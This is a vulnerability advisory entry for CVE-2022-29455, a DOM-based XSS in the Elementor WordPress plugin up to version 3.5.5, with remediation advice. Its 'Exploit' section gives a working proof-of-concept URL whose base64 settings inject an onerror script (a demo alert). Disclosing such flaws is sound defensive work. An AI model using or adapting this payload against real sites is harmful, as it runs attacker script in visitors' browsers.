---
title: "CVE-2022-29455"
canonical: "https://kb.cynergy.app/space/MD/923631649/CVE-2022-29455"
format: markdown
---
**Description**

DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions.  


**Published On**

06/13/2022

**Updated On**

06/27/2022

**Trending**

TRUE

**CWE**

<u>[CWE-79](http://cwe.mitre.org/data/definitions/79.html)</u>

**Exploit**

https://[yourdomain.com]/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KCdIaSBGcm9tIEN5bmVyZ3knKSIsInN0eWxlIjoiICAgIGJhY2tncm91bmQtY29sb3I6IHdoaXRlO2JhY2tncm91bmQtaW1hZ2U6IHVybChodHRwczovL25lcmRpc3QuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDIwLzA3L21heHJlc2RlZmF1bHQuanBnKTtiYWNrZ3JvdW5kLXNpemU6IGNvbnRhaW47In19



**Credit -** [Rotem Bar](https://www.rotem-bar.com/) (Our friend and Colleague)


**Remediation**

 Update to the latest Elementor Plugin Version


**Reference**

[https://wordpress.org/plugins/elementor/#developers](https://wordpress.org/plugins/elementor/#developers)